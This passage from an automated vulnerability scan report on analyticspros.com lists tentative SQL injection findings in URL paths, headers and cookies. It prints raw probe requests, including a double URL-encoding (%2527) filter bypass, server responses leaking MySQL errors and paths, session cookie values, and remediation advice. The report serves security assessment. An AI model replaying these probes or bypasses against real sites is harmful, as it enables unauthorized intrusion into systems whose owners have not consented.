optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:11:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:11:10 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:11:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.172. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/component/jsetup/comment/function.mysql-connect
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/jsetup/comment/function.mysql-connect?1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=90&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY2Jml0ZW1pZD03MCZmb3JtYXQ9aHRtbCZpZD05MDphbmFseXRpY3MtdG9vbGJhciZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:57:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:57:06 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:57:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /components/com_chronocontact'/css/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 08:23:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:23:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /components/com_chronocontact''/css/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:23:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /components/com_chronocontact'/themes/theme1/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/components/com_chronocontact/themes/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 08:19:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:19:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /components/com_chronocontact''/themes/theme1/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/components/com_chronocontact/themes/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:19:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:20:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:44:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:14:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /images%2527/stories/blogimg/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 08:13:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:13:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /images%2527%2527/stories/blogimg/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /images/stories%2527/products/healtcheck/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 05:02:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 05:02:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /images/stories%2527%2527/products/healtcheck/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:02:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
David Hoyt ------WebKitFormBoundaryR3FBsEiL7ATbVQjt Content-Disposition: form-data; name="text_3"
h02332 ...[SNIP]...
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:38:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php%2527?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:07:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php%2527%2527?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:07:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:07:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:07:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
